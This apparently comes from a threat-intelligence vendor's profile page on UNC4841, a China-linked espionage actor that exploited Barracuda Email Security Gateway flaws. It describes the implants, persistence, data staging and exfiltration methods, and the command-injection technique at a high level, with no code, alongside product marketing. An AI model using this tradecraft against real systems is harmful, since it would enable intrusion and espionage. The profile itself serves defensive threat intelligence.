UNC4841
UNC4841 is a China-linked, suspected Chinese cyber-espionage threat actor assessed by Mandiant as operating in support of the People’s Republic of China (PRC). The group is associated with long-term espionage activity across multiple regions and sectors, and is known for favoring internet-facing edge devices as an access vector. UNC4841 is best known for exploiting Barracuda Email Security Gateway (ESG) zero-day vulnerability CVE-2023-2868, with exploitation reported as active since at least October 2022, to gain access to networks and conduct long-term espionage. Reporting also notes follow-on exploitation of CVE-2023-7102 in Barracuda ESG appliances. In the Barracuda ESG campaign, UNC4841 deployed custom malware including SALTWATER, SEASPY, and SEASIDE. SALTWATER is a backdoor module for the Barracuda SMTP daemon (bsmtpd) that supports file upload/download, command execution, proxying, and tunneling, and was deployed with time-stomping to hide activity. SEASIDE is a Lua-based bsmtpd module that monitors SMTP HELO/EHLO commands, decodes an encoded C2 address and port, and launches the WHIRLPOOL reverse shell utility. Mandiant also identified trojanized Lua modules associated with SEASPRAY and SKIPJACK, as well as SANDBAR, a Linux rootkit used to hide processes. Persistence mechanisms included cron jobs, init script modification, insertion of execution commands into a Perl update script, and startup-loaded kernel module deployment. UNC4841 staged email-related data into .tar.gz archives under /mail/tmp/ and exfiltrated them over TLS using openssl s_client; in limited cases it used anonfiles. Mandiant also observed limited reconnaissance using the open-source fscan tool. Victimology spans public and private sector organizations worldwide. Reporting states attacks affected multiple regions and sectors, with one-third of Barracuda ESG victims reportedly government agencies from at least 16 countries. Targeted collection included academics in Taiwan and Hong Kong and Asian and European government officials in Southeast Asia. Reporting also links UNC4841 exploitation of Barracuda ESG appliances to espionage activity affecting Belgium’s VSSE. Additional reporting notes infrastructure overlap and similar TTPs with Salt Typhoon, including use of 45 domains registered as early as May 2020 to facilitate cyber-espionage operations. Mandiant assessed observed overlaps likely indicate shared infrastructure procurement support rather than the same operators. The only alias directly provided in the content for this actor is UNC4841.
Know when an actor pivots toward your sector
Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.
Tradecraft
20 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.
Associated malware families
8 malware families attributed to this actor across reporting.
3 additional families tracked in Mallory.
Associated vulnerabilities
2 CVEs this actor has used in observed campaigns. 2 of them exploited in the wild.
...UNC4841 exploited Barracuda ESG zero-day vulnerabilities... malicious email attachments to trigger remote command injection in the ESG attachment-scanning component (CVE-2023-2868)... Crafted .tar archives abused Perl’s qx operator to execute arbitrary system commands...
Barracuda later disclosed follow-on exploitation of CVE-2023-7102 in the Spreadsheet::ParseExcel library, again via malicious Excel attachments, to reinstall updated SEASPY and SALTWATER variants after initial remediation.
Observables
32 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.
Recent activity
17 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
China-nexus espionage activity exploiting Barracuda Email Security Gateway (ESG) vulnerabilities (notably CVE-2023-2868 and later CVE-2023-7102) via malicious attachments to gain code execution on ESG appliances, then deploying bespoke implants (SALTWATER, SEASPY, SEASIDE) for persistence, command execution, tunneling, and exfiltration; linked to compromise of Belgium’s VSSE email flows.
China-nexus espionage activity exploiting Barracuda Email Security Gateway vulnerabilities (notably CVE-2023-2868 and later CVE-2023-7102) via malicious attachments to gain code execution on ESG appliances, then deploying bespoke implants (SALTWATER, SEASPY, SEASIDE) for persistence, command execution, tunneling, and exfiltration; linked to compromise of Belgium’s VSSE email flows.
China-nexus espionage activity exploiting Barracuda Email Security Gateway (ESG) vulnerabilities (including CVE-2023-2868 and later CVE-2023-7102) via malicious attachments to gain and maintain persistent access to email gateway infrastructure, enabling long-term collection/exfiltration (including reported compromise of Belgium’s VSSE email flows).
China-linked cluster associated with infrastructure (domains) tied to Salt Typhoon activity; details not expanded in provided content.
The version that knows your environment.
Match sector + geo + tech-stack targeting against your real footprint.
Every observed MITRE ATT&CK technique, grouped by tactic.
Families this actor is known to deploy, with IOCs and behavior.
CVEs this actor has used in known campaigns.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Domains, IPs, and hashes tied to this actor, refreshed continuously.